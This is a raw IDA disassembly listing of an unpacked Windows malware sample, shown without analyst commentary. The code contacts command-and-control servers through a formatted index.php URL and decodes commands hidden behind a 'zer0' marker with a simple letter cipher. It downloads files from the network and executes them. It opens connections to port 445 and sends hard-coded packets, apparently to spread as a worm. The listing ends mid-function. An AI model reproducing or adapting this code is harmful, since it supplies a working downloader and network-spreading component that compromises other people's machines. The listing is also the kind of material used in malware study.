;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DF7EE58E7BFDD36FD071079C6D0ABB34
; File Name : u:\work\df7ee58e7bfdd36fd071079c6d0abb34_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; DATA XREF: sub_314228DB+1A�r
dword_31421004 dd 77DDEBE7h ; DATA XREF: sub_314228DB+38�r
dword_31421008 dd 77DD7883h ; DATA XREF: sub_31422882+3E�r
dword_3142100C dd 77DD761Bh ; DATA XREF: sub_3142284D+14�r
; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; DATA XREF: sub_3142284D+24�r
dword_31421014 dd 77DD6BF0h ; DATA XREF: sub_3142284D+2D�r
; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; DATA XREF: sub_314223B2+17D�r
dword_3142101C dd 77DEA2F9h ; DATA XREF: sub_3142179A+17�r
dword_31421020 dd 77DEA122h ; DATA XREF: sub_3142179A+30�r
dword_31421024 dd 77DEAB80h ; DATA XREF: sub_3142179A+4D�r
dword_31421028 dd 77DEA254h ; DATA XREF: sub_3142179A+5B�r
dword_3142102C dd 77DEA544h ; DATA XREF: sub_3142177E+8�r
dword_31421030 dd 77DE8546h ; DATA XREF: sub_3142177E+12�r
dword_31421034 dd 77DE7F96h ; DATA XREF: sub_3142172F+6�r
dword_31421038 dd 77DEA879h ; DATA XREF: sub_3142172F+3D�r
align 10h
dword_31421040 dd 7C809AE4h ; DATA XREF: sub_31422CB9+B�r
dword_31421044 dd 7C809A51h ; DATA XREF: sub_31422CA5+D�r
dword_31421048 dd 7C80B4CFh ; DATA XREF: sub_31422B67+17�r
dword_3142104C dd 7C80BAA1h ; DATA XREF: sub_31422B67+E9�r
dword_31421050 dd 7C8286EEh ; DATA XREF: sub_31422A9B+71�r
dword_31421054 dd 7C86136Dh ; DATA XREF: sub_31422A9B+B0�r
dword_31421058 dd 7C864B0Fh ; DATA XREF: sub_31422D2C�r
dword_3142105C dd 7C863DE5h ; DATA XREF: sub_31422D26�r
dword_31421060 dd 7C801E16h ; DATA XREF: sub_3142292E+9B�r
dword_31421064 dd 7C863F58h ; DATA XREF: sub_31422D20�r
dword_31421068 dd 7C80BE01h ; DATA XREF: sub_31422712+13�r
; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; DATA XREF: sub_314223B2+C8�r
dword_31421070 dd 7C802520h ; DATA XREF: sub_3142239E+8�r
dword_31421074 dd 7C831EABh ; DATA XREF: UPX0:31422346�r
; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; DATA XREF: sub_314211A0+ED�r
dword_3142107C dd 7C809B47h ; DATA XREF: sub_314211A0+B9�r
; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; DATA XREF: sub_314211A0+8F�r
; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; DATA XREF: sub_314211A0+5A�r
; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; DATA XREF: sub_314211A0+3D�r
; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; DATA XREF: sub_314211A0+37�r
; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; DATA XREF: sub_314215C7+29�r
dword_31421094 dd 7C802442h ; DATA XREF: sub_314216A2+7D�r
; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; DATA XREF: sub_314216A2+1�r
dword_3142109C dd 7C810111h ; DATA XREF: sub_31421801+4F�r
dword_314210A0 dd 7C80DDF5h ; DATA XREF: sub_31421D68+4D�r
dword_314210A4 dd 7C80ADA0h ; DATA XREF: sub_31421D68+13�r
; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; DATA XREF: sub_31421D68+D�r
; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; DATA XREF: sub_31421DF0+BC�r
dword_314210B0 dd 7C8309E1h ; DATA XREF: sub_31421DF0+8A�r
; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; DATA XREF: sub_31421DF0+26�r
; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; DATA XREF: sub_31421EFB+12�r
dword_314210BC dd 7C80E93Fh ; DATA XREF: sub_31421F29+8�r
dword_314210C0 dd 7C810637h ; DATA XREF: sub_31421F38+12�r
; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; DATA XREF: sub_31421FA3+38�r
dword_314210C8 dd 7C80A017h ; DATA XREF: sub_3142204E+13�r
dword_314210CC dd 7C81320Ch ; DATA XREF: sub_3142204E+8�r
dword_314210D0 dd 7C80C058h ; DATA XREF: sub_3142207E+137�r
; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; DATA XREF: sub_3142207E+F4�r
; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; DATA XREF: sub_314221C4+92�r
dword_314210DC dd 7C810A77h ; DATA XREF: sub_314221C4+6E�r
dword_314210E0 dd 7C81CDDAh ; DATA XREF: UPX0:31422370�r
; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; DATA XREF: UPX0:31422361�r
dword_314210EC dd 77C371BCh ; DATA XREF: sub_31421EFB+22�r
dword_314210F0 dd 77C46F70h ; DATA XREF: sub_31422CE2�r
dword_314210F4 dd 77C478A0h ; DATA XREF: sub_31422CDC�r
dword_314210F8 dd 77C475F0h ; DATA XREF: sub_31422CD6�r
dword_314210FC dd 77C371D3h ; DATA XREF: sub_314216A2:loc_314216FC�r
; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; DATA XREF: sub_31421422+3C�r
; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; DATA XREF: sub_31421316+37�r
; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; DATA XREF: sub_31421DF0+5D�r
dword_31421114 dd 7E41BE4Bh ; DATA XREF: sub_31421DF0+67�r
dword_31421118 dd 7E418A80h ; DATA XREF: sub_31421DF0+7A�r
dword_3142111C dd 7E41A8ADh ; DATA XREF: sub_314215C7+5D�r
; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; DATA XREF: sub_314211A0+A9�r
; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; DATA XREF: sub_314211A0+18�r
; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; DATA XREF: sub_314215C7+C5�r
dword_31421130 dd 42C367F6h ; DATA XREF: sub_31422038+8�r
; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; DATA XREF: sub_314211A0+DB�r
; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; DATA XREF: sub_31422308+10�r
dword_31421140 dd 71AB3E00h ; DATA XREF: sub_314221C4+100�r
dword_31421144 dd 71AB88D3h ; DATA XREF: sub_314221C4+10D�r
dword_31421148 dd 71AC1028h ; DATA XREF: sub_314221C4+120�r
dword_3142114C dd 71AB50C8h ; DATA XREF: sub_31421FF9+C�r
dword_31421150 dd 71AB94DCh ; DATA XREF: sub_31421FF9+17�r
dword_31421154 dd 71AB4FD4h ; DATA XREF: sub_31421FF9+25�r
dword_31421158 dd 71AB3B91h ; DATA XREF: sub_31421801+2B�r
; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; DATA XREF: sub_31421801+44�r
; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; DATA XREF: sub_31421801+147�r
; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; DATA XREF: sub_31421801+15D�r
dword_31421168 dd 71AB428Ah ; DATA XREF: sub_31421801+17B�r
; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; DATA XREF: sub_31421801+1A4�r
; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; DATA XREF: sub_31421801+550�r
; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; DATA XREF: sub_31421801+559�r
; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31421422+5�o
dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_314223B2+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078
push [ebp+var_4]
call dword_3142107C
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aJutgkfousuoenl ; "jutgkfousuoenlppl"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi
push edi
call esi
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx
push 0
push offset dword_31424FEC
call ebx
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C
push 0
push dword ptr [esi]
call dword_31421030
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
